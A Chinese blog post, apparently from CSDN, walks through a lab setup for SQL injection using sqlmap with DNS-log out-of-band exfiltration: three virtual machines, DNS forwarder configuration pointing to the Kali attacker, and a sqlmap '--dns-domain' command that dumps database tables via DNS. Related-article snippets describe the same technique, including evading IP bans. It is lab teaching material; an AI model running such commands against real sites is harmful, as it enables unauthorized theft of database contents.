复现dns外带数据结合sqlmap

最新推荐文章于 2024-06-05 21:40:45 发布
原创 最新推荐文章于 2024-06-05 21:40:45 发布 · 151 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #windows #servlet

本文介绍了如何在实验环境中利用sqlmap工具结合dnslog进行SQL注入攻击的步骤。实验涉及三台虚拟机,分别作为kali攻击机、Windows10靶机和Windows2008R2 DNS服务器。通过配置DNS服务器和靶机的DNS设置,成功实现了DNS流量监听。然后使用sqlmap的特定命令进行注入测试,展示了SQL注入的基本流程和技术。

sqlmap结合dnslog
实验环境:

这里使用三台虚拟机,在公网是一样的效果
1.kali(使用sqlmap)      ip:192.168.31.40
2.windows10(靶机)       ip: 192.168.31.33
3.windows 2008 R2 ( 需要设置dns服务器)ip :192.168.31.35 
DNS服务器配置
dns服务器配置(ip为服务器所在主机的ip)

dns转换器配置(ip为kail的ip)

 

设置靶机的dns地址

IP为配置的dns地址

在靶机ping服务器,在kail上发现可以监听到 

开始sqlmap结合dnslog进行注入

命令格式:sqlmap -u "http://xx.xx.xx.xx/index.php?id=1" --technique=T --dns-domain "oupeng.top" -D security --tables
 

 

 

Thin Dog
关注
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 511
通常我们面对SQL注入过程中没有的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
sqlmap+dnslog注入复现
qq_50646296的博客
08-07 1101
2.准备两台虚拟机,一台为Kali(作为攻击机)另一台使用Windows server2008 R2(作为DNS服务器),使用本地物理机作为肉机。编辑本地肉机的dns设置,改为手动,首选DNSwindows server2008 的IP地址。查看secure_file_priv 是否为空值,如果是NULL,需要将其改为空。2 不存在,则在[mysqld]下,新增secure_file_priv=""。然后添加A记录,一条ns,作为域dns服务器,一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.
SQLmap 结合本地dnslog实现注入
lin152235的博客
08-05 380
命令格式:sqlmap -u "http://xx.xx.xx.xx/index.php?2.1添加DNS服务器及正向查找文件添加记录。在kali看到了数据包证明成功。2.2在监视中对测试类型打钩。ip为kali 的ip。2.3添加条件转发器。
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 811
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
sqlmap结合dnslog注入
whojoe的博客
05-25 2412
sqlmap结合dnslog注入环境搭建1.phpstudy2.注入点3.配置mysql4.在线doslog网站5.sqlmap结合dnslog安装dns服务器添加转发(关键)复现手工注入sqlmap的--dns-domain参数注入参考文章 环境搭建 1.phpstudy 去官网下载安装 2.注入点 test.php <?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_char
sql注入-sqlmapDNSLOG的完美结合
weixin_54217950的博客
02-19 3273
sqlmap结合dnslog 实验环境: 这里使用三台虚拟机,在公网是一样的效果 1.kali(使用sqlmap) ip:192.168.31.40 2.windows10(靶机) ip: 192.168.31.33 3.windows 2008 R2 ( 需要设置dns服务器)ip :192.168.31.35 DNS服务器配置 dns服务器配置(ip为服务器所在主机的ip) dns转换器配置(ip为kail的ip) 设置靶机的dns地址 IP为配置的dns地址 在靶机pi
sqlmap+dnslog外带数据
m0_52813136的博客
08-04 474
sqlmap dnslog
【sql注入】sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 2477
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 1416
sqlmap渗透进阶】DNS-domain注入
https防止注入_数据DNSLog外带注入总结
weixin_39553600的博客
11-20 690
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
sqlmap结合dnslog快速注入
weixin_67259816的博客
05-22 874
该文章记录了搭建dns服务器,和使用sqlmap结合dnslog快速注入数据
sqlmap使用_使用sqlmap结合dnslog快速注入
weixin_39962675的博客
12-09 530
0x01 起因实际项目中遇到一个oracle延时注入,需要获取数据,几十个库几百张表,等找到关键数据不知道要到哪天.测试支持带外请求于是想用使用sqlmap利用DNS进行OOB注入0x02 阿里云主机与DNS解析配置1.首先购买一个域名并且进行备案,然后还需要一台vps2.配置DNS解析创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.t...
sqlmap直接嗦 dnslog注入 sqllibs第8关
最新发布
helloKittywz的博客
06-05 629
工具就是这样来操作,跟上我们要的dnslog的参数,这样就可以了。我们不能直接进行sqlmap盲注,这样容易被对方给封ip,所以我们前面要进行一些手工注入,我们来看看手工注入。但是我们要使用dnsllog注入的要求就比较的严格了,我们要对文件有。经过我的判断,这点是字符,然后闭合的方式是‘来进行闭合的 下面是正常的。这点也就是判断出来了注入点,然后就直接进行爆后面的数据,然后我们在来爆到数据库。我们是用了dns解析的时候会留下记录,这时候就可以看见我们想要的内容。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 919
SQL注入——DNSlog注入
sqlmap + dnslog外带数据
CYLK1987310466的博客
08-06 1229
sqlmap dnslog外带数据
DNSLog注入及SQLmap工具使用
2301_80034711的博客
03-18 1535
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据服务器的权限。
sqlmap --dns-domain模拟实践
weixin_33724659的博客
10-13 751
因为看到乌云的这一篇文章http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入,所以想本地模拟一个环境进行测试。 首先dns注入 mysql> show variables like '%skip%'; +------------------------+---...
Burp Suite结合sqlmap的应用
05-27
Burp Suite和sqlmap都是常用的Web应用安全测试工具,结合使用可以提高测试效率和准确性。...需要注意的是,使用sqlmap进行注入测试可能会对Web应用程序造成影响,建议在测试前备份相关数据,谨慎操作。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值